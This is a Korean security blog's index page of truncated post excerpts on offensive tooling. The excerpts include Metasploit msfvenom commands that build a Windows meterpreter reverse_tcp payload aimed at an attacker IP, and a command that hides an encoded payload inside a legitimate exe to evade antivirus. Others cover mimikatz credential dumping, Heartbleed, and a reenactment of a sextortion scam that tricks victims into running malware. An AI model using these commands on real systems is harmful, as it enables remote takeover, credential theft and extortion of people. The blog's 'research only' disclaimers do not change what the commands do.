Lucete

Brutal – Toolkit to quickly create various payloads,powershell and virus attacksBrutal - 빠르고 다양한 payloads, 파워셸과 바이러스 공격을 위한 툴킷 https://github.com/screetsec/brutal

모든 책임은 사용자 본인에게 있습니다. 먼저 service apache2 start 를 실행해준다.다음은 service postgresql start 명령어를 실행시킨 후service metasploit start 를 실행해준다.다음은 armitage를 실행시킨다.이러한 창을 볼수있을 텐데 connect를 누르고 yes를 누르고 기다리면 음~~ 음~~~ 기다리면이러한 창이 뜬다.tab창에서 hosts -> add ..

모든 책임은 사용자 본인에게 있습니다.먼저 service apache2 startservice postgresql startservice metasploit startmsfvenom -p windows/meterpreter/reverse_tcp LHOST=[attacker ip] LPORT=[원하는 포트] -f exe > filename.exe그럼 /root 폴더에 exe파일이 생긴것을 확인할수 있다.그럼 다음으로는 컨트롤할 핸들러..

모든 책임은 사용자에게 있습니다. 연구 목적으로만 사용하시기 바랍니다.먼저 하기전에 리눅스에서 service apache2 startservice postgresql startservice metastploit start 명령어들을 실행 시켜준다.그 후 msfconsole을 해준다. 그럼 위와같은 창이 뜰것이다. (그림은 다를 수 있다.)그 후 우리가 해야할 일은 핸들러를 만드는 일이다.use exploit/multi/brows..

heartbleed 는 2015년 보안 취약점 중 대표적인 취약점이라 할수 있다.heartbleed 취약점은 공격자가 서버의 메모리의 일부분을 읽어 올 수 있는 openSSL의 취약점으로 요청할때 요청할 단어가 만약 aaa이면 3바이트를 요청하면 되는데 이 보다 더 큰 바이트인 500을 하게 된다면 aaa를 반환하고 남은 메모리를 다른 값으로 뱉어 주는 취약점을 말한다.취약점을 실습해볼 때에는 1. https://raw.gith..

mimikatz는 windows 계정을 알아내기 위한 도구이다. https://github.com/gentilkiwi/mimikatz위에서 mimikatz를 다운받은 후 cmd 를 이용 하여 mimikatz 폴더 까지 이동을 한다.(폴더에서 실행 파일로 실행 해도 된다.)이동을 하고 dir 을 확인해보면 mimikatz.exe라는 파일을 실행 시킨다.실행을 시키면 밑에처럼 이러한 리눅스 형식으로 바뀐다.먼저 privilege::debug..

요즘 몸캠이 유행을 했었다.대충 원리를 보면 스카xx같은 곳에서 채팅을 하다가 몸캠을 하자고 파일을 받으라고 한다. (몸캠을 하기위한 전용 파일이라 뻥을 친다.)그러고 파일을 보내는데 그 파일은 당연히 악성코드 !! :)이제 그것을 재연해보자 그전에 모든 책임은 사용자 본인에게 있습니다.시작해보자 :X먼저 service apache2 start로 아파치를 실행 시켜주고 service postgresql start 로 postgres..

모든 사용의 법적 책임은 사용자 본인에게 있습니다.msfvenom -a 아키텍쳐 --platform 플랫폼 -x file.exe -k -p PAYLOAD lhost=ip lport=PORT -e x86/shikata_ga_nai -i 3 -b "\x00" -f exe -o outputfilename.exeex) msfvenom -a x86 --platform windows -x file.exe -k -p ..